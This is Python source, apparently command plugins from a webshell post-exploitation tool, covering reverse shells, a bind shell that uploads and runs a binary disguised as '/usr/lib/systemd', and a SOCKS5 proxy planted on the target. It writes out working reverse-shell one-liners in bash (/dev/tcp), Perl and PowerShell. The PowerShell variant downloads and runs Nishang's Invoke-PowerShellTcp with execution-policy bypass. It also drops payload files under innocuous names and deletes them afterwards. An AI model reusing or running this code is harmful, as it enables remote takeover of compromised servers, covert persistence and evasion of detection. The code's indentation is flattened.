def run(lhost: str,
port: int,
mode: int = 0,
fakename: str = "/usr/lib/systemd"):
"""
reshell
Bind a local port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}
"""
if (is_windows(False) or is_windows()):
print(color.red(f"Only for both system is linux."))
return False
try:
port = int(port)
except ValueError:
port = 23333
disable_func_list = gget("webshell.disable_functions", "webshell")
MODE = 1
print(color.yellow(f"Waring: You are using a testing command...."))
print(color.yellow(f" Please make sure Port {port} open...."))
if (mode == 0):
if (has_env("python")):
print(color.green(f"Traget has python environment."))
MODE == 1
else:
print(color.red(f"Traget has not python environment."))
MODE == 2
else:
MODE = int(mode)
if ("proc_open" in disable_func_list):
print(color.red("proc_open is disabled... Try Mode 3"))
return
if (MODE == 1):
print(color.yellow(f"Use Mode 1->python"))
command = get_php(lhost, port)
else:
print(color.yellow(f"Use Mode 2->upload"))
filename = encrypt(f"{lhost}-{port}")
if not upload(
path.join(gget("root_path"), "auxiliary", "reshell",
"reverse_server_x86_64"), "/tmp/%s" % filename,
True):
return
command = get_system_code(
f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}",
False)
t = Thread(target=delay_send, args=(2, command))
t.setDaemon(True)
t.start()
print(f"Bind port {color.yellow(str(port))}...")
if (not bind(port, MODE)):
print(color.red(f"Bind port error."))
if (MODE == 3):
res = send(f"unlink('/tmp/{filename}');")
if (not res):
return
def run(port: int = 8888):
"""
socks
(Only for *unix) Run a socks5 server on the target system by python.
eg: socks {port=8888}
"""
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
flag = has_env("python")
if flag:
python = get_python(port)
pyname = "check.py"
res = send(
f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
)
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(color.red("Failed to write file in /tmp directory."))
return
t = Thread(target=send,
args=(get_system_code(f"python /tmp/{pyname}"), ))
t.setDaemon(True)
t.start()
t2 = Thread(target=delay_send,
args=(
10.0,
f"unlink('/tmp/{pyname}');",
))
t2.setDaemon(True)
t2.start()
sleep(1)
if (t.isAlive()):
print(
f"\nStart socks5 server listen on {port} {color.green('success')}.\n"
)
else:
print(f"\nStart socks5 server {color.red('error')}.\n")
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
))
def run(ip: str, port: str, reverse_type: str = "php"):
"""
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
reverse_type:
- bash
- php
- python
- powershell(ps)
- perl (only for *unix)
"""
reverse_type = str(reverse_type).lower()
upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
if reverse_type == "bash":
if (is_windows()):
print(color.red("Target system is windows"))
return
command = f"""bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'"""
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "php":
php = get_reverse_php(ip, port, upload_tmp_dir)
t = Thread(target=send, args=(php,))
t.setDaemon(True)
t.start()
if (is_windows()):
t2 = Thread(target=delay_send, args=(
10.0, f"unlink('{upload_tmp_dir}\\\\services.exe');",))
t2.setDaemon(True)
t2.start()
elif reverse_type in ("powershell", "ps"):
command = '''IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -port %s''' % (ip, port)
command = f"powershell -nop -ep bypass -encodedcommand {base64_encode(command, encoding='utf-16le')}"
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "perl":
if (is_windows()):
print(color.red("Target system is windows"))
return
command = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (
ip, port)
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "python":
if has_env("python"):
t = Thread(target=send, args=(get_system_code(get_reverse_python(ip, port), False),))
t.setDaemon(True)
t.start()
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
)
)
return
else:
print(color.red("Reverse type Error."))
return
sleep(1)
if (t.isAlive()):
print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
else:
print(f"\nReverse shell {color.red('error')}.\n")
def run(ip: str, port: str, reverse_type: str = "php"):
"""
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
"""
reverse_type = str(reverse_type).lower()
if reverse_type == "php":
php = get_reverse_php(ip, port)
t = Thread(target=send, args=(php, ))
t.setDaemon(True)
t.start()
elif reverse_type == "python":
if has_env("python"):
python = get_reverse_python(ip, port)
if is_windows():
pyname = "python-update.py"
upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
res = send(
f"print(file_put_contents('{upload_tmp_dir}{pyname}', \"{python}\"));"
)
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(
color.red(
f"Failed to write file in {upload_tmp_dir if upload_tmp_dir else 'current'} directory."
))
return
t = Thread(target=send,
args=(get_system_code(
f"python {upload_tmp_dir}{pyname}", False), ))
t.setDaemon(True)
t.start()
t2 = Thread(target=delay_send,
args=(
10.0,
f"unlink('{upload_tmp_dir}{pyname}');",
))
t2.setDaemon(True)
t2.start()
else:
t = Thread(target=send,
args=(get_system_code(python, False), ))
t.setDaemon(True)
t.start()
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
))
return
else:
print(color.red("Reverse type Error."))
return
sleep(1)
if (t.isAlive()):
print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
else:
print(f"\nReverse shell {color.red('error')}.\n")